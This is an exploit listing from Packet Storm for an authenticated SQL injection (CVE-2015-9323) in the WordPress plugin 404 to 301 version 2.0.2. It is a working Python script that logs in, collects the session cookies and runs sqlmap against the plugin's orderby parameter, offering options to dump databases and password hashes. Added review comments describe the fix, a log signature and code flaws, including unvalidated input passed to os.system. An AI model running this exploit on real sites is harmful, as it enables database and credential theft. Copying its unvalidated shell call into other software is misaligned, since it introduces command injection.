WordPress 404 To 301 2.0.2 SQL Injection

2022-02-0200:00:00
Ron Jost
packetstormsecurity.com
`# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)  
# Date 30.01.2022  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/  
# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip  
# Version: <= 2.0.2  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2015-9323  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md  
  
'''  
Description:  
The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.  
'''  
  
# Reviewer summary (what the code below actually does, nothing more):  
#   1. reads target/credentials from the command line,  
#   2. POSTs those credentials to wp-login.php over plain http and keeps the  
#      resulting session cookies,  
#   3. flattens the cookie jar into a "k=v; k=v" string, and  
#   4. shells out to an externally installed `sqlmap` against the plugin's  
#      admin page (page=i4t3-logs), naming `orderby` as the injectable  
#      parameter (-p orderby).  
# The script itself contains no injection logic; everything past the login  
# is delegated to sqlmap. The issue is authenticated (see title) and, per the  
# description string above, addressed in plugin version 2.0.3 — updating the  
# plugin is the fix. For log review, the relevant request shape is an  
# authenticated GET to wp-admin/admin.php?page=i4t3-logs with a non-numeric  
# or unusually long `orderby` value.  
  
banner = '''   
  
.o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b.   
d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D   
8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY'   
8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b.   
Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D   
`Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P'   
  
[+] 404 to 301 - SQL-Injection   
[@] Developed by Ron Jost (Hacker5preme)  
  
'''  
print(banner)  
  
# Imports sit below the banner print; `requests` is third-party, the rest  
# is standard library. `os` is only used for os.system() at the very end.  
import argparse  
import os  
import requests  
from datetime import datetime  
import json  
  
# User-Input:  
# NOTE(review): none of the five options is declared required=True and no  
# default is given, so any omitted option arrives as None and the string  
# concatenation in auth_url below raises TypeError instead of a usage error.  
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
my_parser.add_argument('-u', '--USERNAME', type=str)  
my_parser.add_argument('-p', '--PASSWORD', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
# wp_path is concatenated directly with 'wp-login.php' below, so it is  
# presumably expected to end with '/' (e.g. '/wordpress/') — not validated.  
wp_path = args.PATH  
username = args.USERNAME  
password = args.PASSWORD  
  
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
  
# Authentication:  
session = requests.Session()  
# Scheme is hard-coded to http://, so the credentials in `body` are sent in  
# clear text; there is no TLS option.  
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'  
# Initial GET to seed the session's cookie jar; the response object `check`  
# is never read afterwards.  
check = session.get(auth_url)  
# Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Body:  
# Standard wp-login.php form fields.  
body = {  
'log': username,  
'pwd': password,  
'wp-submit': 'Log In',  
'testcookie': '1'  
}  
# NOTE(review): the login response is neither status-checked nor inspected  
# for a logged-in cookie, so a failed login is not detected here — the  
# script proceeds and hands whatever cookies exist to sqlmap.  
auth = session.post(auth_url, headers=header, data=body)  
  
# SQL-Injection (Exploit):  
  
# Generate payload for sqlmap  
print ('[+] Payload for sqlmap exploitation:')  
# Flatten the cookie jar into sqlmap's "name=value; name=value" format by  
# serialising it to JSON and then stripping the JSON syntax character by  
# character. NOTE(review): this is fragile — every '"', ' ', ':' and ','  
# is rewritten, including any that occur inside a cookie *value*, which  
# would corrupt the result. '; '.join(f'{k}={v}' for k, v in  
# cookies_session.items()) expresses the same intent without that risk.  
cookies_session = session.cookies.get_dict()  
cookie = json.dumps(cookies_session)  
cookie = cookie.replace('"}','')  
cookie = cookie.replace('{"', '')  
cookie = cookie.replace('"', '')  
cookie = cookie.replace(" ", '')  
cookie = cookie.replace(":", '=')  
cookie = cookie.replace(',', '; ')  
  
# The sqlmap command line is assembled as one shell string; the target URL  
# points at the plugin's log page and `orderby` is the parameter under test.  
exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'  
exploit_risk = ' --level 2 --risk 2'  
exploit_cookie = r' --cookie="' + cookie + r'" '  
  
print(' Sqlmap options:')  
print(' -a, --all Retrieve everything')  
print(' -b, --banner Retrieve DBMS banner')  
print(' --current-user Retrieve DBMS current user')  
print(' --current-db Retrieve DBMS current database')  
print(' --passwords Enumerate DBMS users password hashes')  
print(' --tables Enumerate DBMS database tables')  
print(' --columns Enumerate DBMS database table column')  
print(' --schema Enumerate DBMS schema')  
print(' --dump Dump DBMS database table entries')  
print(' --dump-all Dump all DBMS databases tables entries')  
# NOTE(review): the interactive answer is spliced verbatim into the command  
# string and executed through the shell by os.system(); it is not validated  
# against the menu above, and shell metacharacters in it (or in the  
# cookie string / target values) are interpreted by the shell. Running  
# sqlmap via subprocess.run([...]) with an argument list would avoid  
# shell interpretation entirely; its exit status is also ignored here.  
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')  
exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'  
os.system(exploit_code)  
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
`

0.007 Low

EPSS

Percentile

80.0%